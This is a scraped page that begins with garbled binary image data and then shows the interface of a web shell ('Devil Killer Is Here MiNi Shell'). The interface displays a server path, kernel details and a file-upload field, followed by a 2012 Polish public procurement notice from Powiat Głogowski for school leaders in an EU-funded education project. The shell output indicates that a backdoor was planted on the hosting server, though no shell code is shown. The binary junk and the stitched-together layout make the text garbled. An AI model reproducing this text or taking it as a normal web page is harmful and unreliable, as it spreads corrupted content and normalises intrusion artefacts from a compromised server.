JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120712/152033-N-2012.html

<p class="kh_header"><b>Głogów: Wybór liderów szkolnych w ramach projektu Moja przyszłość w moich rękach</b><br>
<b>Numer ogłoszenia: 152033 - 2012; data zamieszczenia: 12.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Głogowski , ul. Sikorskiego 21, 67-200 Głogów, woj. dolnośląskie, tel. 076 7282801, faks 076 7282817.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.glogow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór liderów szkolnych w ramach projektu Moja przyszłość w moich rękach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje: Wybór liderów szkolnych w ramach projektu Moja przyszłość w moich rękach Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet: IX Rozwój wykształcenia i kompetencji w regionach. Działanie: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w podziale na niżej wymienione części zamówienia:

CZĘŚĆ I: Wybór lidera szkolnego w II Liceum Ogólnokształcącym im. Mikołaja Kopernika w Głogowie, przy ul. Daszyńskiego 15.

UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 8 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 4 godziny pracy na tydzień  w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 2833, planowana liczba uczestników projektu wynosi - 320 uczniów-uczennic

CZĘŚĆ II: Wybór lidera szkolnego w Zespole Szkół z Oddziałami Integracyjnymi w Głogowie, przy ul. Perseusza 5.

UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 5 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 2,5 godziny pracy na tydzień w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 774, planowana liczba uczestników projektu wynosi - 48 uczniów-uczennic

CZĘŚĆ III: Wybór lidera szkolnego w Zespole Szkół im. J. Wyżykowskiego w Głogowie, przy 
ul. Wita Stwosza 3a.

UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 8 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 4 godziny pracy na tydzień w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 2481, planowana liczba uczestników projektu wynosi - 182 uczniów-uczennic

CZĘŚĆ IV: Wybór lidera szkolnego w Zespole Placówek Szkolno - Wychowawczych w Głogowie, przy ul. Sportowej 1.

UWAGA: Zaangażowanie tygodniowe lidera szkolnego ustala się na nie mniej niż 5 godzin pracy na tydzień w miesiącach: wrzesień - czerwiec oraz na nie mniej niż 2,5 godziny pracy na tydzień w miesiącach: lipiec, sierpień.

Planowana liczba godzina zajęć dodatkowych realizowanych w ramach programu rozwojowego w latach szkolnych 2012-2013 i 2013-2014 wynosi - 832, planowana liczba uczestników projektu wynosi - 64 uczniów-uczennic

2.Przedmiot zamówienia obejmuje koordynowanie prac związanych z realizacją programu rozwojowego szkoły w zakresie:
ZADANIA OGÓLNE W SZCZEGÓLNOŚCI:
-udział w szkoleniu z zakresu równości szans kobiet i mężczyzn w projekcie,
-udział w spotkaniach zespołu projektowego,
-obsługa kontroli, 
-utrzymywanie stałej współpracy z biurem projektu, 
-zgłaszanie wszelkich nieprawidłowości podczas realizacji projektu do biura projektu,
-wykonywanie innych obowiązków wynikających bezpośrednio z projektu i z obowiązków nałożonych przez Instytucję Pośredniczącą,
-promowanie projektu, informowanie społeczności lokalnej o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, 
-oznaczanie wszelkiej wytwarzanej dokumentacji zgodnie z zasadami promocji POKL, 
-przyjęcie dostaw materiałów biurowych na potrzeby zarządzania projektem i ich rozdysponowanie,
-prowadzenie niezbędnej dokumentacji projektu zgodnie z przekazanymi wzorami dokumentów przez biuro projektu,
-przechowywanie wszelkiej wytworzonej dokumentacji projektowej w okresie wskazanym przez biuro projektu,  
-najpóźniej w ostatnim dniu trwania umowy zlecenie przekazanie pełnej dokumentacji projektowej  dyrektorowi szkoły,
-inne zadania nie przewidziane wyżej
ZADANIA ZWIĄZANE Z ZAKUPEM POMOCY DYDAKTYCZNYCH, W TYM ELEMNTÓW PAKIETÓW SZKOLENIOWYCH W SZCZEGÓLNOŚCI:
-dokonanie opisu przedmiotu zamówienia do przetargów na zakupu pomocy dydaktycznych: podręczników i innych wydawnictw, materiałów biurowych, programów komputerowych, i innych określonych w pakietach szkoleniowych, 
-sprawdzanie ofert pod kątem zgodności wykazanego towaru z założeniami projektu,
-odbiór i sprawdzenie pod względem ilościowym i jakościowym  dostarczanych pomocy dydaktycznych oraz materiałów biurowych zakupionych w ramach projektu,
-oznaczanie naklejkami z logo POKL, EFS zakupionych pomocy dydaktycznych,
-wprowadzenie na stan szkoły zakupionych pomocy dydaktycznych,
-kompletowanie pakietów szkoleniowych dla ucznia i dla trenera,
-przygotowanie i rozdanie pakietów dla uczniów i nauczycieli za potwierdzeniem odbioru,
-na koniec każdej edycji zajęć dodatkowych odebranie od trenerów i uczestników projektu przekazanych pomocy dydaktycznych stanowiących majątek szkoły,
-inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z REALIZACJĄ PROGRAMÓW ROZWOJOWYCH SZKOŁY W ZAKRESIE REALIZACJI ZAJĘĆ DODATKOWYCH W SZCZEGÓLNOŚCI::
-zapewnienie przez okres trwania zajęć bazy dydaktycznej (dostępność sal lekcyjnych, sprawność sprzętu, pomoce dydaktyczne, materiały itp.) do prowadzenia zajęć dodatkowych, 
-zorganizowanie zajęć dodatkowych zgodnie z  programem rozwojowym szkoły w zakresie rozwoju kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego ujętych projekcie, 
-dbałość o zapewnienie właściwej realizacji projektu w części dotyczącej realizacji programów rozwojowych w szkołach i placówkach, zgodnej z wnioskiem o dofinansowanie oraz prawodawstwem polskim i unijnym,
-oznaczenie szkoły plakatami projektu w szczególności sal lekcyjnych, w których będą prowadzone zajęcia
-inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z ZATRUDNIANIEM I NADZOREM NAD ZATRUDNIONYMI TRENERAMI W SZCZEGÓLNOŚCI:
-dokonanie opisu przedmiotu zamówienia do przetargu dotyczącego zatrudniania trenerów do prowadzenia zajęć z zakresu kompetencji kluczowych oraz poradnictwa i doradztwa edukacyjno-zawodowego,
-sprawdzanie ofert w zakresie posiadanych kwalifikacji zawodowych trenerów,
-przeszkolenie zatrudnionych trenerów z zakresu równości szans kobiet i mężczyzn w projekcie, 
-przygotowanie pakietu dokumentów dla zatrudnionych trenerów na potrzeby prowadzenia zajęć (dziennik zajęć, druki: listy obecności, wywiady dla uczniów, dokumenty rozliczeniowej. protokół odbioru, sprawozdanie, rachunek), 
-opracowywanie miesięcznych zbiorczych harmonogramów zajęć w odniesieniu do swojej szkoły i ich przekazanie do biura projektu,
-bieżące gromadzenie dokumentów rozliczeniowych od trenerów i przekazanie do biura projektu,
-monitorowanie prowadzenia zajęć dodatkowych przez trenerów pod kątem zgodności z przesłanym harmonogramem do IP,  w szczególności liczby realizowanych godzin zajęć, 
-potwierdzanie liczby zrealizowanych godzin zajęć przez każdego trenera w danym miesiącu,
-zgłaszanie na bieżąco wszelkich zmian w harmonogramie zajęć do biura projektu,
-sprawdzenie dokumentacji przekazanej przez trenerów po każdej edycji zajęć tj. dzienników zajęć, list obecności, wywiadów z uczniami poda kątem poprawności wypełniania oraz zgodności z zapisami projektu
-inne zadania nie przewidziane wyżej,
ZADANIA ZWIĄZANE Z  UDZIAŁEM  UCZESTNIKÓW PROJEKTU W SZCZEGÓLNOŚCI:
-rozpowszechnieni informacji w szkole wśród uczniów o prowadzonym naborze do projektu pn. Moja przyszłość w moich rękach za pomocą strony internetowej szkoły, tablicy ogłoszeń itp.
-prowadzenie procesu rekrutacji  i naboru grupy docelowej uczestników projektu (gromadzenie dokumentów zgłoszeniowych, układanie list przyjętych, wywieszenie list przyjętych, złożenie sprawozdania z rekrutacji do biura projektu, zawarcie umów z pełnoletnimi uczestnikami lub ich opiekunami prawnymi),
-zgromadzenie formularzy i wprowadzenie do bazy PEFS danych uczestników projektu,
-poinformowanie uczestników projektu, że ich udział w  projekcie pn. Moja przyszłość w moich rekach jest bezpłatny, a wszystkie prowadzone działania w projekcie są współfinansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
-przeprowadzenie badania ankietowego uczestników projektu na wejście do projektu i na zakończenie udziału w projekcie w każdej edycji zajęć,
-opracowanie analizy każdego badania ewaluacyjnego oraz podsumowania obejmującego dwie edycje
-bieżące monitorowanie udziału uczestników projektu w zajęciach dodatkowych,
-inne zadania nie przewidziane wyżej.

3. Szczegółowy zakres i warunki wykonania zamówienia określa: 
-Projekt umowy - załącznik nr 2 do SIWZ
4. Zgodnie z art. 36 ust. 5 ustawy Pzp Zamawiający nie wyraża zgody na realizację zamówienia przez podwykonawców.
UWAGA: Zamawiający zastrzega, iż jeden Wykonawca może złożyć ofertę tylko na jedną część zamówienia zgodnie z art. 83 ust. 3 ustawy pzp. W ramach każdej części wyłoniony zostanie jeden Wykonawca. 
5. UWAGA: Zamawiający wymaga złożenia przez Wykonawcę(1) oświadczenia w ofercie o zaangażowaniu lub braku zaangażowania w Projekty realizowane w ramach wszystkich programów NSRO. W przypadku przekroczenia przez Wykonawcę limitu zaangażowania w realizację zadań we wszystkich projektach NSRO, łącznie 240 godzin miesięcznie, Zamawiający odrzuci ofertę Wykonawcy jako nieważną i niezgodną z Wytycznymi w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki, z dnia 15.12.2011r. oraz Zasadami finansowania Programu Operacyjnego Kapitał Ludzki z dnia 22.12.2011r. - załącznik nr 1A do SIWZ.
(1) dotyczy Wykonawców stanowiących personel projektu, które są osobami zaangażowanymi do realizacji zadań w ramach projektu, które osobiście wykonują zadania w ramach projektu, tj. w szczególności osoby zatrudnione na podstawie stosunku pracy lub stosunku cywilnoprawnego, osoby samozatrudnione, osoby fizyczne prowadzące działalność gospodarczą, osoby współpracujące w rozumieniu ustawy z dnia 13 października 1998r. o systemie ubezpieczeń społecznych (Dz.U. 
z 2009r. Nr 205, poz. 1585, z późn. zm.) oraz osoby wykonujące świadczenia w formie wolontariatu.
6. Miejsce realizacji zamówienia - siedziby szkół ponadgimnazjalnych odpowiednio dla części zamówienia:
Dla części I - II Liceum Ogólnokształcące im. Mikołaja Kopernika w Głogowie, ul. Daszyńskiego 15.
Dla części II - Zespół Szkół z Oddziałami Integracyjnymi w Głogowie, ul. Perseusza 5.
Dla części III - Zespół Szkół im. J. Wyżykowskiego w Głogowie, ul. Wita Stwosza 3a.
Dla części IV - Zespół Placówek Szkolno - Wychowawczych w Głogowie, ul. Sportowa 1..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego opisu sposobu dokonania oceny warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego opisu sposobu dokonania oceny warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego opisu sposobu dokonania oceny warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże że, dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie, wykształcenie i kwalifikacje zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone, a w szczególności osobami (wymagana minimum jedna osoba na daną część, na którą wykonawca składa ofertę), które będą uczestniczyć w wykonywaniu zamówienia, z których każda winna posiadać: 
- wykształcenie wyższe pedagogiczne lub pokrewne (zgodnie z treścią rozporządzenia Ministra Edukacji Narodowej z dnia 12.03.2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli - Dz. U. z 2009r., Nr 50, Poz. 400 z późń. zm.),
- minimalny staż pracy pedagogicznej 10 lat, w tym na stanowisku kierowniczym związanym z prowadzeniem nadzoru pedagogicznego minimum 1 rok *stanowisko kierownicze rozumiane zgodnie z przepisami Ustawy z dnia 7 września 1991 r. 
o systemie oświaty.
- Stopień awansu zawodowego nauczyciela - minimum stopień nauczyciela dyplomowanego
- Wiedzę w zakresie znajomości merytorycznej i organizacji pracy szkół ponadgimnazjalnych i gimnazjalnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego opisu sposobu dokonania oceny warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dla każdej  części  zamówienia kompletna oferta musi zawierać:
a) formularz oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ. Integralną cześć formularza ofertowego stanowi załacznik nr 1A do SIWZ, tj. oświadczenie o zaangażowaniu lub braku zaangażowania w Projekty realizowane w ramach wszystkich programów NSRO.
b)pełnomocnictwo(a) - w przypadku, o ile ofertę składa pełnomocnik. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego, 
c)dokumenty wymienione w pkt 6 niniejszej SIWZ,
d)załącznik nr 8 do SIWZ w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający działając w oparciu o art. 144 ust.1 ustawy Pzp określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian treści zawartej umowy w stosunku do treści złożonej oferty, w szczególności:
1)W razie niemożności realizowania zadań wynikających z zawartej umowy przez Wykonawcę (np. zwolnienie lekarskie, zdarzenie losowe), będzie on mógł we własnym zakresie zapewnić zastąpienie go przez inną osobę. Osoba zastępująca winna spełniać wymagania określone w SIWZ. O zmianie takiej Wykonawca zobowiązany jest uprzednio poinformować Zamawiającego na piśmie w celu uzgodnienia zastępstwa.
2)Inne zmiany, których nie można było przewidzieć w chwili zawierania umowy przy dochowaniu należytej staranności.
3)Zmiany są korzystne dla Zamawiającego.

Zmiany postanowień treści zawartej umowy w przypadku wystąpienia okoliczności, o których mowa powyżej odbywać się będą w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://sbip.pl/nglogowsp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Głogowie ul. Sikorskiego 21; Biuro Zamówień Publicznych pok. nr 302-303 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.07.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Głogowie ul. Sikorskiego 21; sekretariat pok. nr 103 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Programu Operacyjnego Kapitał Ludzki Priorytet: IX Rozwój wykształcenia i kompetencji w regionach. Działanie: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Zamawiający nie zamierza zawrzeć umowy ramowej, Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów, Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wybór lidera szkolnego w II Liceum Ogólnokształcącym im. Mikołaja Kopernika w Głogowie, przy ul. Daszyńskiego 15..</p>
